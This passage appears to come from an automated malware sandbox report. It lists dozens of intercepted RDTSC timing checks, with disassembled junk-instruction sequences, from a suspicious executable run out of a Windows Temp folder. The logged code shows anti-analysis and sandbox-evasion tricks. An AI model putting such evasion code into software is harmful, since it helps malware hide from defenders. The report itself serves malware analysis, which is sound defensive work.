                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD6DF second address: 9FD6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD6E3 second address: 9FD6F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD6F2 second address: 9FD6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD6F8 second address: 9FD723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F73D4D0E055h 0x00000010 jc 00007F73D4D0E046h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD723 second address: 9FD75D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c jng 00007F73D4C5760Ch 0x00000012 jnl 00007F73D4C57606h 0x00000018 pop edi 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007F73D4C5760Eh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 push ecx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jns 00007F73D4C57606h 0x00000031 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A0305E second address: A03062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A03062 second address: A03071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F73D4C57606h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A031AF second address: A031B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A034CD second address: A034EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F73D4C57606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F73D4C5760Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A0390D second address: A03913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A03913 second address: A03919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A03919 second address: A0391D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A09E36 second address: A09E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F73D4C57606h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A09E40 second address: A09E4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F73D4D0E046h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A08C1F second address: A08C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F73D4C57606h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DC84E second address: 9DC89E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D19BDh], edx 0x00000014 lea eax, dword ptr [ebp+124815D2h] 0x0000001a call 00007F73D4D0E057h 0x0000001f sub dword ptr [ebp+12464381h], ecx 0x00000025 pop edi 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007F73D4D0E04Dh 0x0000002f js 00007F73D4D0E046h 0x00000035 popad 0x00000036 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DCDD9 second address: 9DCDDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DCDDD second address: 9DCDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DCFE9 second address: 9DCFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DD18E second address: 9DD192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DD78A second address: 9DD78E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DD78E second address: 9DD7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F73D4D0E046h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DDA2C second address: 9DDA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DDAFF second address: 9DDB05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DDB05 second address: 9DDB0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DDB0B second address: 9DDB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A08F14 second address: A08F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A08F1C second address: A08F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A09080 second address: A0909D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A09255 second address: A09264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A09264 second address: A09268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A093E6 second address: A093ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A093ED second address: A09401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C5760Eh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A096D8 second address: A096DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A12947 second address: A12975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57615h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F73D4C57608h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A12EBC second address: A12EE4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F73D4D0E046h 0x00000012 jmp 00007F73D4D0E056h 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A12EE4 second address: A12F01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57613h 0x00000007 jnl 00007F73D4C57606h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A12F01 second address: A12F12 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F73D4D0E046h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A12F12 second address: A12F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F73D4C57617h 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A135FD second address: A13601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13601 second address: A13607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13607 second address: A13624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F73D4D0E04Ch 0x0000000e jp 00007F73D4D0E056h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13624 second address: A13632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4C5760Ah 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13632 second address: A1363E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F73D4D0E04Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A138F2 second address: A13928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4C57618h 0x00000009 jns 00007F73D4C57606h 0x0000000f js 00007F73D4C57606h 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 jbe 00007F73D4C57606h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13928 second address: A13949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F73D4D0E055h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13949 second address: A1394F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13D35 second address: A13D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13D39 second address: A13D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F73D4C57617h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13D5F second address: A13D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A13D63 second address: A13D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A19FD5 second address: A19FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A19FD9 second address: A19FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F73D4C57608h 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A1A5C1 second address: A1A5CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A1A8CB second address: A1A8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A1A8D1 second address: A1A8E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F73D4D0E046h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4D0E04Ah 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A1A8E9 second address: A1A8ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A206AB second address: A206B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A206B1 second address: A206C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A206C5 second address: A206CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A206CB second address: A206CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A1CD second address: A2A209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F73D4D0E065h 0x0000000f jmp 00007F73D4D0E04Eh 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A209 second address: A2A20E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A20E second address: A2A218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A32C second address: A2A330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A330 second address: A2A347 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F73D4D0E051h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A347 second address: A2A34C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A34C second address: A2A352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A352 second address: A2A388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F73D4C57606h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jnc 00007F73D4C57606h 0x00000016 jmp 00007F73D4C5760Ch 0x0000001b pop eax 0x0000001c jmp 00007F73D4C57613h 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A637 second address: A2A659 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jl 00007F73D4D0E046h 0x0000000f pop esi 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F73D4D0E04Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A659 second address: A2A65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2A65D second address: A2A69D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E056h 0x00000007 jmp 00007F73D4D0E04Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F73D4D0E054h 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DD5D4 second address: 9DD62E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F73D4C57616h 0x00000010 nop 0x00000011 xor di, 0C21h 0x00000016 push 00000004h 0x00000018 mov di, EE6Bh 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F73D4C57610h 0x00000025 jns 00007F73D4C57606h 0x0000002b popad 0x0000002c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2B385 second address: A2B398 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007F73D4D0E046h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 999E55 second address: 999E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 999E59 second address: 999E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2EB0A second address: A2EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F73D4C57606h 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2EB20 second address: A2EB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f js 00007F73D4D0E046h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2EB39 second address: A2EB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F73D4C57606h 0x0000000a popad 0x0000000b jmp 00007F73D4C57610h 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2ECAD second address: A2ECB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2ECB3 second address: A2ECB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2ECB7 second address: A2ECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2EE24 second address: A2EE28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2EE28 second address: A2EE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2EE2E second address: A2EE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2EE34 second address: A2EE48 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F73D4D0E04Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2EE48 second address: A2EE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: A2EE4E second address: A2EE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
